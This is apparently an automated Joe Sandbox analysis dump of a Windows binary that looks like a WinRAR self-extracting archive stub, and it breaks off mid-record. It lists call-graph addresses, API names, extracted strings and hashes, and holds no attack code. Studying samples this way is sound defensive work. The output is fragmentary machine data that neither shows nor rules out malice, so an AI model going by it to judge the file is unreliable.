7ff65594ef66 27333 7ff655921f80 33 API calls 3 library calls 26982->27333 26989 7ff65594e963 26983->26989 26987 7ff65594ec2a 26987->26973 26987->26982 26996 7ff65594ec72 memcpy_s 26987->26996 27001 7ff65594ed3b memcpy_s 26987->27001 27003 7ff6559521d0 33 API calls 26987->27003 26993 7ff65594ef30 26988->26993 26994 7ff65594ef60 26989->26994 27002 7ff65592129c 33 API calls 26989->27002 26992 7ff65594ed40 26992->26978 26992->26980 26992->27001 27006 7ff6559521d0 33 API calls 26992->27006 27007 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26993->27007 27332 7ff65592704c 47 API calls memcpy_s 26994->27332 26995 7ff655933d34 51 API calls 26995->27039 27247 7ff65594f4e0 26996->27247 26998 7ff65594d5e9 GetDlgItem 27005 7ff655922520 SetDlgItemTextW 26998->27005 27001->26977 27008 7ff65594e9a6 27002->27008 27003->26996 27009 7ff65594d608 IsDlgButtonChecked 27005->27009 27006->27001 27012 7ff65594ef36 27007->27012 27322 7ff65593d22c 27008->27322 27009->27039 27010 7ff65593dc2c 33 API calls 27010->27039 27011 7ff655922674 31 API calls 27011->27039 27016 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27012->27016 27015 7ff655935b60 53 API calls 27015->27039 27020 7ff65594ef3c 27016->27020 27017 7ff65594d63c IsDlgButtonChecked 27017->27039 27019 7ff655933f30 54 API calls 27019->27039 27024 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27020->27024 27023 7ff65594e9d1 27023->27026 27038 7ff65594ef48 27023->27038 27045 7ff65594ef4e 27023->27045 27053 7ff655921fa0 31 API calls 27023->27053 27054 7ff65592129c 33 API calls 27023->27054 27056 7ff6559413c4 CompareStringW 27023->27056 27060 7ff65593d22c 33 API calls 27023->27060 27028 7ff65594ef42 27024->27028 27026->26987 27026->26992 27029 7ff65594ef5a 27026->27029 27052 7ff65594ef54 27026->27052 27027 7ff655921fa0 31 API calls 27027->27039 27035 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27028->27035 27034 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 
27029->27034 27030 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27030->27029 27031 7ff655924228 33 API calls 27031->27039 27032 7ff65594d95e SHFileOperationW 27032->27039 27033 7ff655921744 33 API calls 27033->27032 27034->26994 27035->27038 27036 7ff655935820 33 API calls 27036->27039 27037 7ff6559332a8 51 API calls 27037->27039 27043 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27038->27043 27039->26920 27039->26923 27039->26926 27039->26929 27039->26931 27039->26933 27039->26936 27039->26938 27039->26941 27039->26942 27039->26946 27039->26951 27039->26952 27039->26958 27039->26961 27039->26962 27039->26963 27039->26969 27039->26971 27039->26972 27039->26979 27039->26993 27039->26995 27039->27010 27039->27011 27039->27012 27039->27015 27039->27017 27039->27019 27039->27020 27039->27027 27039->27028 27039->27031 27039->27032 27039->27033 27039->27036 27039->27037 27040 7ff655935aa8 33 API calls 27039->27040 27041 7ff655928d04 33 API calls 27039->27041 27042 7ff65592e164 33 API calls 27039->27042 27044 7ff65592250c SetDlgItemTextW 27039->27044 27047 7ff655937df4 47 API calls 27039->27047 27048 7ff655921150 33 API calls 27039->27048 27050 7ff6559499c8 31 API calls 27039->27050 27057 7ff65594df99 EndDialog 27039->27057 27059 7ff6559332bc 51 API calls 27039->27059 27061 7ff65594db21 MoveFileW 27039->27061 27064 7ff65592129c 33 API calls 27039->27064 27066 7ff655932f58 56 API calls 27039->27066 27067 7ff655922034 33 API calls 27039->27067 27246 7ff6559413c4 CompareStringW 27039->27246 27286 7ff65593cfa4 35 API calls _invalid_parameter_noinfo_noreturn 27039->27286 27287 7ff6559495b4 33 API calls Concurrency::cancel_current_task 27039->27287 27288 7ff655950684 31 API calls _invalid_parameter_noinfo_noreturn 27039->27288 27289 7ff65592df4c 47 API calls memcpy_s 27039->27289 27290 7ff65594a834 33 API calls _invalid_parameter_noinfo_noreturn 27039->27290 27291 7ff655949518 33 API calls 27039->27291 27292 7ff65594a440 116 API calls 2 library 
calls 27039->27292 27293 7ff65594abe8 33 API calls 3 library calls 27039->27293 27294 7ff655937368 33 API calls 2 library calls 27039->27294 27295 7ff655934088 33 API calls 27039->27295 27296 7ff6559365b0 33 API calls 3 library calls 27039->27296 27297 7ff6559372cc 27039->27297 27301 7ff6559331bc 27039->27301 27315 7ff655933ea0 FindClose 27039->27315 27316 7ff6559413f4 CompareStringW 27039->27316 27317 7ff655949cd0 47 API calls 27039->27317 27318 7ff6559487d8 51 API calls 3 library calls 27039->27318 27319 7ff65594ab54 33 API calls _handle_error 27039->27319 27320 7ff655935b08 CompareStringW 27039->27320 27321 7ff655937eb0 47 API calls 27039->27321 27040->27039 27041->27039 27042->27039 27043->27045 27044->27039 27049 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27045->27049 27047->27039 27048->27039 27049->27052 27050->27039 27052->27030 27053->27023 27054->27023 27056->27023 27057->27039 27059->27039 27060->27023 27062 7ff65594db55 MoveFileExW 27061->27062 27063 7ff65594db70 27061->27063 27062->27063 27063->27039 27065 7ff655921fa0 31 API calls 27063->27065 27064->27039 27065->27063 27066->27039 27067->27039 27070 7ff65594f9a3 27069->27070 27071 7ff6559220b0 33 API calls 27070->27071 27072 7ff65594f9b9 27071->27072 27073 7ff65594f9ee 27072->27073 27074 7ff6559220b0 33 API calls 27072->27074 27344 7ff65592e34c 27073->27344 27074->27073 27076 7ff65594fa4b 27364 7ff65592e7a8 27076->27364 27080 7ff65594fa61 27081 7ff655952320 _handle_error 8 API calls 27080->27081 27082 7ff65594bc52 27081->27082 27082->26749 27084 7ff65594849c 4 API calls 27083->27084 27085 7ff65594f3bf 27084->27085 27086 7ff65594f4b7 27085->27086 27087 7ff65594f3c7 GetWindow 27085->27087 27088 7ff655952320 _handle_error 8 API calls 27086->27088 27092 7ff65594f3e2 27087->27092 27089 7ff65594be9b 27088->27089 27089->26510 27089->26511 27090 7ff65594f3ee GetClassNameW 28322 7ff6559413c4 CompareStringW 27090->28322 27092->27086 27092->27090 27093 7ff65594f496 GetWindow 27092->27093 27094 
7ff65594f417 GetWindowLongPtrW 27092->27094 27093->27086 27093->27092 27094->27093 27095 7ff65594f429 IsDlgButtonChecked 27094->27095 27095->27093 27096 7ff65594f445 GetObjectW 27095->27096 28323 7ff655948504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27096->28323 27098 7ff65594f461 27099 7ff6559484cc 4 API calls 27098->27099 28324 7ff655948df4 16 API calls _handle_error 27098->28324 27099->27098 27101 7ff65594f479 IsDlgButtonChecked DeleteObject 27101->27093 27103 7ff655922527 27102->27103 27104 7ff65592252a SetDlgItemTextW 27102->27104 27103->27104 27105 7ff65598e2e0 27104->27105 27106->26532 27107->26559 27108->26598 27110 7ff6559332bc 51 API calls 27109->27110 27111 7ff6559332b1 27110->27111 27111->26610 27111->26634 27112->26610 27113->26694 27114->26723 27115->26734 27116->26740 27117->26747 27118->26756 27120 7ff655953620 27119->27120 27120->26759 27120->27120 27121->26673 27123 7ff655921177 27122->27123 27124 7ff655922034 33 API calls 27123->27124 27125 7ff655921185 memcpy_s 27124->27125 27125->26691 27127->26717 27128->26808 27129->26835 27131 7ff655933e28 swprintf 46 API calls 27130->27131 27132 7ff65593a509 27131->27132 27133 7ff655940f68 WideCharToMultiByte 27132->27133 27139 7ff65593a519 27133->27139 27134 7ff65593a589 27155 7ff655939408 27134->27155 27137 7ff65593a603 27142 7ff65593a60c GetWindowLongPtrW 27137->27142 27143 7ff65593a6c2 27137->27143 27138 7ff65593a6f2 GetSystemMetrics GetWindow 27140 7ff65593a71d 27138->27140 27141 7ff65593a821 27138->27141 27139->27134 27147 7ff655939800 31 API calls 27139->27147 27153 7ff65593a56a SetDlgItemTextW 27139->27153 27140->27141 27151 7ff65593a73e GetWindowRect 27140->27151 27154 7ff65593a800 GetWindow 27140->27154 27144 7ff655952320 _handle_error 8 API calls 27141->27144 27145 7ff65598e2c0 27142->27145 27170 7ff6559395a8 27143->27170 27148 7ff65593a830 27144->27148 27149 7ff65593a6aa GetWindowRect 27145->27149 27147->27139 27148->26848 27149->27143 27151->27140 27152 7ff65593a6e5 SetDlgItemTextW 
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWaitWindow
                                                                                • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                • API String ID: 2128803032-2702805183
                                                                                • Opcode ID: 01a438109652fbf301756464df9dbc0de690b25f660d933aded9320d3491b7ef
                                                                                • Instruction ID: e8838d2247371789dbe572081310e4de0992055d66bdcd6e5645889b015dcecf
                                                                                • Opcode Fuzzy Hash: 01a438109652fbf301756464df9dbc0de690b25f660d933aded9320d3491b7ef
                                                                                • Instruction Fuzzy Hash: 7AD2E36AA087C285EA20DB25E8582F96351FF85F88F484135D99DB7AA7DF3CED44C340
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$ButtonCheckedMove$DialogItemOperationPathTemp
                                                                                • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                • API String ID: 2285161090-3916287355
                                                                                • Opcode ID: fd2ad00ce84fbf863eb190845ef4c9fcac58144421a2a3ec869aeac6c2c057d6
                                                                                • Instruction ID: 60a1e457e14ddaa2821364ad4f4c89bffaafff329958c412912147cbb828a03e
                                                                                • Opcode Fuzzy Hash: fd2ad00ce84fbf863eb190845ef4c9fcac58144421a2a3ec869aeac6c2c057d6
                                                                                • Instruction Fuzzy Hash: C3139F6AA04BC2C5EB10DF64D8482EC27A1FB44B9CF580535DA6DA7A9ADF3CDD94C340

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                • API String ID: 1048086575-3710569615
                                                                                • Opcode ID: e7d3594d41fc1c42d2a273e76cc46138f8b85040c46b05d7c1c5927625479fcd
                                                                                • Instruction ID: 32f9894556785607b4ca41940ee6514ce17becb6b5ed9fa00daae8890a57957d
                                                                                • Opcode Fuzzy Hash: e7d3594d41fc1c42d2a273e76cc46138f8b85040c46b05d7c1c5927625479fcd
                                                                                • Instruction Fuzzy Hash: C0129A79A187C281EB10DB24E84D2B96361FF85F8CF584231DA9DA6A97DF3CE954C340

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                • String ID: $%s:$CAPTION
                                                                                • API String ID: 1936833115-404845831
                                                                                • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction ID: d2a10ad701181eb29662c9313f5a1032a53c51ee4d99528248f551c4d5ec24a5
                                                                                • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction Fuzzy Hash: 5D911B36B1868287E714CF29E81866967A1FBC5B88F485435EE4DA7B59CF3CEC05CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                • String ID: PNG
                                                                                • API String ID: 541704414-364855578
                                                                                • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction ID: 52c47363969ee6b0a5425ba8aef9ba8344f4b826949306efd90da5ce8cae4cc2
                                                                                • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction Fuzzy Hash: 30413039A09B8281EE048B56D4583B963A0BF88FD8F0C4435CE5DA7766EF7CEC498341
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: __tmp_reference_source_
                                                                                • API String ID: 3668304517-685763994
                                                                                • Opcode ID: 5284b8deacc18d9dd878dcda6fbd0c25d4ad9dd8b7c2e50a2c8a7b8efee843d9
                                                                                • Instruction ID: 13bf3f94dfb688c20e03efbcad25261bc33c995807eda6c8334f850cd45c04bd
                                                                                • Opcode Fuzzy Hash: 5284b8deacc18d9dd878dcda6fbd0c25d4ad9dd8b7c2e50a2c8a7b8efee843d9
                                                                                • Instruction Fuzzy Hash: 4AE2BA6AA086C192EE64CB65D5483FE67A1FB41B48F484131DB9DA36A7CF3CF855C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: CMT
                                                                                • API String ID: 3668304517-2756464174
                                                                                • Opcode ID: 9b9b17b47160488b51796ce07d531ea6025730b83c8e66bf90b899a3d3ffa88f
                                                                                • Instruction ID: 49dc89c840c3874b0dd085d916bfb5a2d6287b373be2741cadeced0dea503da8
                                                                                • Opcode Fuzzy Hash: 9b9b17b47160488b51796ce07d531ea6025730b83c8e66bf90b899a3d3ffa88f
                                                                                • Instruction Fuzzy Hash: DDE2016AB096C286EB18DB71D9582FD67A1FB44B88F480035CA5EA7793DF3CE854C300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                • String ID:
                                                                                • API String ID: 474548282-0
                                                                                • Opcode ID: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                • Instruction ID: 86087b75b8ceea3cbc8c82d97b9d4cdb2998936d6e53b59df19e364e2aacd2fc
                                                                                • Opcode Fuzzy Hash: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                • Instruction Fuzzy Hash: 4F61D866A08AC281DA108B54E94C2BD6361FF95FA8F155331EAADA36DADF3CD944C700

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CMT
                                                                                • API String ID: 0-2756464174
                                                                                • Opcode ID: 81cbc51edb26831c97f40985bc080a49e7e7386e8398e3b88c9e13d1af394772
                                                                                • Instruction ID: 72c47fe8a54f339aa1bf9c851ef749d96c05d5f238643c7c4a69e448d03176be
                                                                                • Opcode Fuzzy Hash: 81cbc51edb26831c97f40985bc080a49e7e7386e8398e3b88c9e13d1af394772
                                                                                • Instruction Fuzzy Hash: 6D42E16AB096C196EB18DB74C5582FD67A0EB41B4CF480136DB5EA7A97DF3CE918C300
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                • String ID:
                                                                                • API String ID: 3340455307-0
                                                                                • Opcode ID: 388497648aa7178462f46e8a8cb48851b3eb3f46bbabbbefb59410a44eea80d8
                                                                                • Instruction ID: 7a02800528c309ec4161c55d41e72ea579d1eabda0e704e330669e8ace8e5d5e
                                                                                • Opcode Fuzzy Hash: 388497648aa7178462f46e8a8cb48851b3eb3f46bbabbbefb59410a44eea80d8
                                                                                • Instruction Fuzzy Hash: 6041F866B156D686FA64DF11A90C76E2252FBC4F8CF0A4034DE0DA7796DF3CE8428704

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                • API String ID: 1496594111-2013832382
                                                                                • Opcode ID: 98412f925c25e5251e7433e2f7fa53b3e9c32244f994fcc6063bd743035dabb3
                                                                                • Instruction ID: 1639b877df5efc8b725d87078639cb850880f03c011f1f00d36006ee65c9ee6b
                                                                                • Opcode Fuzzy Hash: 98412f925c25e5251e7433e2f7fa53b3e9c32244f994fcc6063bd743035dabb3
                                                                                • Instruction Fuzzy Hash: E2324039A09BC295EB119F60E8481E933A4FF44B5CF581136DA4DA7766EF3CDA58C380
                                                                                APIs
                                                                                  • Part of subcall function 00007FF655938E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF655938F8D
                                                                                • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF655939F75
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65593A42F
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65593A435
                                                                                  • Part of subcall function 00007FF655940BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF655940B44), ref: 00007FF655940BE9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                • API String ID: 3629253777-3268106645
                                                                                • Opcode ID: 73d56d0c11a86a55a1dc3675c73e4a0fd07f95c757df1f2c588dae54c11dd42d
                                                                                • Instruction ID: be199191a1df914d0a1507efe340d0be7b00d10b31bbe76980509de2ab35ff31
                                                                                • Opcode Fuzzy Hash: 73d56d0c11a86a55a1dc3675c73e4a0fd07f95c757df1f2c588dae54c11dd42d
                                                                                • Instruction Fuzzy Hash: E662B02AA196C2C6EB10DF64D44C2BD63A5FB40B8CF894131DA5DA7A96EF3CED44C341

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                • String ID: H
                                                                                • API String ID: 3432403771-2852464175
                                                                                • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction ID: 3eefbbfa8ec3b6520450c0c99b96087d21b042db8ad6deff58492e69e8342766
                                                                                • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction Fuzzy Hash: BD91693AA05B928AEB10CF65D8486A833B5FF08B99F094435DE4D6774AEF3CE855C340

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                • String ID: .exe$.inf$Install$p
                                                                                • API String ID: 148627002-3607691742
                                                                                • Opcode ID: a9537e312442e646dd9c9462cba9269d27ba10dbd49a782409ce5fb443879e24
                                                                                • Instruction ID: d2441a335ce06a1475988314056b26a3834a03500f4dce0b0dd5763dfab05fd4
                                                                                • Opcode Fuzzy Hash: a9537e312442e646dd9c9462cba9269d27ba10dbd49a782409ce5fb443879e24
                                                                                • Instruction Fuzzy Hash: BDC1706AF18682D5FB10CB25D95827923A1FF85F88F084035DA9DA77A6DF3CEC958300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
